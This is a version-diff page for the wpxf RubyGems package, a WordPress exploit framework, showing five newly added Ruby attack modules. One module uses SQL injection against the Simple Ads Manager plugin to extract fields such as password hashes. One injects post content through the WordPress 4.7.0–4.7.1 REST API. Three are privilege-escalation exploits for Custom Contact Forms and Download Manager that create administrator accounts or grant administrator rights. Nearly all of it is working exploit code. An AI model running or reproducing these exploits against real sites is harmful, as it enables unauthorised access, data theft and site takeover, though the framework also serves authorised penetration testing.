RubyGems - wpxf - Versions diffs - 2.0.0a - Mend

wpxf 2.0.0a

Files changed (455) hide show

data/lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb ADDED

@@ -0,0 +1,124 @@
+# frozen_string_literal: true
+require 'base64'
+require 'json'
+class Wpxf::Auxiliary::SimpleAdsManagerSqlInjection < Wpxf::Module
+  include Wpxf
+  def initialize
+    super
+    update_info(
+      name: 'Simple Ads Manager SQL Injection',
+      desc: 'This module exploits an SQL injection in version '\
+            '2.9.5.116 of the Simple Ads Manager plugin which '\
+            'allows unauthenticated users to view a single field of '\
+            'data at a time, such as e-mails and passwords.',
+      author: [
+        'Kacper Szurek', # Vulnerability discovery
+        'rastating'      # WPXF module
+      ],
+      references: [
+        ['URL', 'http://security.szurek.pl/simple-ads-manager-294116-sql-injection.html'],
+        ['WPVDB', '8357']
+      ],
+      date: 'Dec 30 2015'
+    )
+    register_options([
+      StringOption.new(
+        name: 'sql',
+        desc: 'The SQL query to execute (maximum of one field selected)',
+        default: 'select user_pass from wp_users where ID = 1',
+        required: true
+      )
+    ])
+  end
+  def sql
+    normalized_option_value('sql')
+  end
+  def valid_query?
+    match = sql.match(/^select\s+(.+)\s+from.+/i)
+    if match.nil?
+      emit_error 'Could not determine the field list from the query', true
+      return false
+    end
+    if match[1].include?(',') || match[1].include?('*')
+      emit_warning 'More than one field appears to have been selected. This '\
+                   'can cause the query to silently fail and return no data'
+    end
+    true
+  end
+  def compile_sqli
+    padding = ''
+    (1..22).each { |i| padding += ",#{Utility::Text.rand_numeric(rand(1..3))}" }
+    sql.gsub(/^(select\s+)(.+)(\s+from.+)/i, ") UNION (\\1\\2#{padding}\\3")
+  end
+  def check
+    check_plugin_version_from_readme('simple-ads-manager', '2.9.5.118', '2.9.4.116')
+  end
+  def vulnerable_url
+    normalize_uri(wordpress_url_plugins, 'simple-ads-manager', 'sam-ajax-loader.php')
+  end
+  def encoded_injection
+    compiled_sqli = compile_sqli
+    emit_info "Compiled SQL: #{compiled_sqli}", true
+    serialized = "a:4:{s:2:\"WC\";s:3:\"1=0\";s:3:\"WCT\";s:0:\"\";s"\
+                 ":3:\"WCW\";s:#{compiled_sqli.bytesize}:\"#{compiled_sqli}\""\
+                 ";s:4:\"WC2W\";s:0:\"\";}"
+    Base64.strict_encode64(serialized)
+  end
+  def run
+    return false unless super
+    emit_info 'Validating SQL...'
+    unless valid_query?
+      emit_error 'Specified query appears to be invalid'
+      return false
+    end
+    emit_info 'Preparing injection...'
+    body = {
+      'action' => 'load_place',
+      'id' => '0',
+      'pid' => '1',
+      'wc' => encoded_injection
+    }
+    emit_info 'Executing request...'
+    res = execute_post_request(url: vulnerable_url, body: body)
+    if res.nil? || res.timed_out?
+      emit_error 'No response from the target'
+      return false
+    end
+    if res.code != 200 || res.body.strip.empty?
+      emit_info "Response code: #{res.code}", true
+      emit_info "Response body: #{res.body}", true
+      emit_error 'Failed to execute request'
+      return false
+    end
+    emit_info 'Parsing response...'
+    begin
+      json = JSON.parse(res.body)
+      emit_success "Query result: #{json['pid']}"
+    rescue JSON::ParserError
+      emit_error 'Could not parse the response'
+      return false
+    end
+    true
+  end
+end

data/lib/wpxf/modules/auxiliary/misc/wp_v4.7.1_content_injection.rb ADDED

@@ -0,0 +1,107 @@
+# frozen_string_literal: true
+class Wpxf::Auxiliary::WpV471ContentInjection < Wpxf::Module
+  include Wpxf
+  def initialize
+    super
+    update_info(
+      name: 'WordPress 4.7.0 - 4.7.1 Unauthenticated Content Injection',
+      desc: %(
+        The REST API in versions 4.7.0 and 4.7.1 of WordPress contain a number
+        of validation issues, which allow unauthenticated users to edit any post
+        on the target installation.
+        If the target has the API enabled (enabled by default), this module will
+        update the post with the specified content, title and or excerpt.
+      ),
+      author: [
+        'Sucuri <sucuri.net>', # Disclosure
+        'rastating'            # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8734'],
+        ['URL', 'https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html']
+      ],
+      date: 'Feb 01 2017'
+    )
+    register_options([
+      IntegerOption.new(
+        name: 'post_id',
+        desc: 'The ID of the post to update',
+        required: true
+      ),
+      StringOption.new(
+        name: 'content',
+        desc: 'The content to inject',
+        required: false
+      ),
+      StringOption.new(
+        name: 'title',
+        desc: 'The title to inject',
+        required: false
+      ),
+      StringOption.new(
+        name: 'excerpt',
+        desc: 'The excerpt to inject',
+        required: false
+      )
+    ])
+  end
+  def check
+    version = wordpress_version
+    return :unknown if version.nil?
+    if version == Gem::Version.new('4.7') || version == Gem::Version.new('4.7.1')
+      return :vulnerable if rest_api_is_available
+    end
+    :safe
+  end
+  def rest_api_is_available
+    res = execute_get_request(url: wordpress_url_rest_api)
+    (res && res.code == 200)
+  end
+  def post_id
+    normalized_option_value('post_id')
+  end
+  def post_route
+    normalize_uri(wordpress_url_rest_api, 'wp', 'v2', 'posts', post_id)
+  end
+  def api_request_body
+    data = {}
+    data['content'] = datastore['content'] if datastore['content']
+    data['title'] = datastore['title'] if datastore['title']
+    data['excerpt'] = datastore['excerpt'] if datastore['excerpt']
+    data
+  end
+  def run
+    return false unless super
+    emit_info 'Building request...'
+    data = api_request_body
+    emit_info "Request: #{data.inspect}", true
+    emit_info 'Injecting content...'
+    execute_put_request(
+      url: post_route,
+      body: data.to_json,
+      params: {
+        'id' => "#{post_id}#{Utility::Text.rand_alpha(3)}"
+      },
+      headers: {
+        'Content-Type' => 'application/json'
+      }
+    )
+    true
+  end
+end

data/lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb ADDED

@@ -0,0 +1,125 @@
+# frozen_string_literal: true
+class Wpxf::Auxiliary::CustomContactFormsPrivilegeEscalation < Wpxf::Module
+  include Wpxf
+  include Wpxf::WordPress::Login
+  def initialize
+    super
+    update_info(
+      name: 'Custom Contact Forms Privilege Escalation',
+      desc: 'The Custom Contact Forms plugin, up to and including version '\
+            '5.1.0.3, allows unauthenticated users to create new admin users '\
+            'due to lack of validation when uploading SQL files.',
+      author: [
+        'Marc-Alexandre Montpas', # Vulnerability discovery
+        'rastating'               # WPXF module
+      ],
+      references: [
+        ['URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html'],
+        ['URL', 'https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail='],
+        ['WPVDB', '7542']
+      ],
+      date: 'Aug 07 2014'
+    )
+    register_options([
+      StringOption.new(
+        name: 'username',
+        desc: 'The username to register with',
+        default: Utility::Text.rand_alpha(10)
+      ),
+      StringOption.new(
+        name: 'password',
+        desc: 'The password to register with',
+        default: Utility::Text.rand_alpha(rand(10..20))
+      )
+    ])
+  end
+  def username
+    normalized_option_value('username')
+  end
+  def password
+    normalized_option_value('password')
+  end
+  def hashed_password
+    Utility::Text.md5(password)
+  end
+  def check
+    check_plugin_version_from_readme('custom-contact-forms', '5.1.0.4')
+  end
+  def table_prefix
+    res = execute_post_request(
+      url: wordpress_url_admin_post,
+      body: {
+        'ccf_export' => '1'
+      }
+    )
+    return nil if res.code != 200 || res.body.nil? || res.body.empty?
+    match = res.body.match(/insert into `(.+_)customcontactforms_fields`/i)
+    return nil if match.nil? || match.length < 2
+    match[1]
+  end
+  def sql(prefix)
+    <<-END_OF_SQL
+      INSERT INTO #{prefix}users (user_login, user_pass) VALUES ('#{username}','#{hashed_password}');
+      INSERT INTO #{prefix}usermeta (user_id, meta_key, meta_value) VALUES ((select id from #{prefix}users where user_login='#{username}'),'#{prefix}capabilities','a:1:{s:13:"administrator";b:1;}'),((select id from #{prefix}users where user_login='#{username}'),'#{prefix}user_level','10');
+    END_OF_SQL
+  end
+  def sql_filename
+    "#{Utility::Text.rand_alpha(5)}.sql"
+  end
+  def payload_body_builder(prefix)
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string('import_file', sql(prefix), sql_filename)
+    builder.add_field('ccf_merge_import', '1')
+    builder
+  end
+  def run
+    return false unless super
+    emit_info 'Extracting table prefix...'
+    prefix = table_prefix
+    if prefix.nil?
+      emit_error 'Unable to determine table prefix'
+      return false
+    else
+      emit_success "Found table prefix: #{prefix}", true
+    end
+    emit_info 'Creating new admin user...'
+    res = nil
+    payload_body_builder(prefix).create do |body|
+      scoped_option_change('follow_http_redirection', false) do
+        res = execute_post_request(url: wordpress_url_admin_post, body: body)
+      end
+    end
+    if res.code != 302 || res.headers['Location'] != 'options-general.php?page=custom-contact-forms'
+      emit_error 'Failed to create new user'
+      emit_error "Code: #{res.code}", true
+      emit_error "Location header: #{res.headers['Location']}", true
+      return false
+    end
+    emit_info 'Verifying new account...'
+    if wordpress_login(username, password)
+      emit_success "User #{username} with password #{password} successfully created"
+      return true
+    else
+      emit_error 'Failed to create new user'
+      return false
+    end
+  end
+end

data/lib/wpxf/modules/auxiliary/priv_esc/download_manager_authenticated_privilege_escalation.rb ADDED

@@ -0,0 +1,71 @@
+# frozen_string_literal: true
+class Wpxf::Auxiliary::DownloadManagerAuthenticatedPrivilegeEscalation < Wpxf::Module
+  include Wpxf
+  def initialize
+    super
+    update_info(
+      name: 'Download Manager Authenticated Privilege Escalation',
+      desc: %(
+        The Download Manager plugin, in versions 2.8.4 to 2.8.7,
+        allows authenticated users to escalate their user role to
+        that of an administrator.
+      ),
+      author: [
+        'James Golovich', # Disclosure
+        'rastating'       # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8365'],
+        ['URL', 'http://www.pritect.net/blog/wordpress-download-manager-2-8-8-critical-security-vulnerabilities']
+      ],
+      date: 'Jan 19 2016'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('download-manager', '2.8.8', '2.8.4')
+  end
+  def requires_authentication
+    true
+  end
+  def run
+    return false unless super
+    body = {
+      'wpdm_profile' => {
+        'display_name' => username,
+        'role' => 'administrator'
+      },
+      'pfile_data' => {
+        'display_name' => username,
+        'role' => 'administrator'
+      },
+      'password'        => password,
+      'cpassword'       => password,
+      'payment_account' => '0'
+    }
+    mod_result = true
+    scoped_option_change('follow_http_redirection', false) do
+      res = execute_post_request(
+        url: full_uri,
+        body: body,
+        cookie: session_cookie
+      )
+      if res.code == 302
+        emit_success "User #{username} now has full admin rights"
+      else
+        emit_error 'Failed to escalate privileges'
+        mod_result = false
+      end
+    end
+    mod_result
+  end
+end

data/lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb ADDED

@@ -0,0 +1,92 @@
+# frozen_string_literal: true
+require 'socket'
+class Wpxf::Auxiliary::DownloadManagerPrivilegeEscalation < Wpxf::Module
+  include Wpxf
+  include Wpxf::WordPress::Login
+  def initialize
+    super
+    update_info(
+      name: 'Download Manager Privilege Escalation',
+      desc: 'The Download Manager plugin, in versions 2.7.0 to 2.7.4, '\
+            'allows unauthenticated users to create new admin users '\
+            'due to lack of validation wpdm_ajax_call_exec.',
+      author: [
+        'Mickael Nadeau', # Vulnerability discovery
+        'rastating'       # WPXF module
+      ],
+      references: [
+        ['EDB', '35533'],
+        ['WPVDB', '7706']
+      ],
+      date: 'Dec 3 2014'
+    )
+    register_options([
+      StringOption.new(
+        name: 'username',
+        desc: 'The username to register with',
+        default: Utility::Text.rand_alpha(10)
+      ),
+      StringOption.new(
+        name: 'password',
+        desc: 'The password to register with',
+        default: Utility::Text.rand_alpha(rand(10..20))
+      )
+    ])
+  end
+  def username
+    normalized_option_value('username')
+  end
+  def password
+    normalized_option_value('password')
+  end
+  def check
+    check_plugin_version_from_readme('download-manager', '2.7.5', '2.7.0')
+  end
+  def uploads_url
+    normalize_uri(wordpress_url_wp_content, 'uploads', 'download-manager-files')
+  end
+  def run
+    return false unless super
+    emit_info 'Creating new admin user...'
+    res = execute_post_request(
+      url: full_uri,
+      body: {
+        'action'      => 'wpdm_ajax_call',
+        'execute'     => 'wp_insert_user',
+        'user_login'  => username,
+        'user_pass'   => password,
+        'role'        => 'administrator'
+      }
+    )
+    emit_info "Response code: #{res.code}", true
+    emit_info "Response body: #{res.body}", true
+    emit_info 'Verifying new account...'
+    if wordpress_login(username, password)
+      emit_success "User #{username} with password #{password} successfully created"
+      return true
+    else
+      emit_error 'Failed to create new user'
+      return false
+    end
+    if res.nil? || res.timed_out?
+      emit_error 'No response from the target'
+      return false
+    end
+    return true
+  end
+end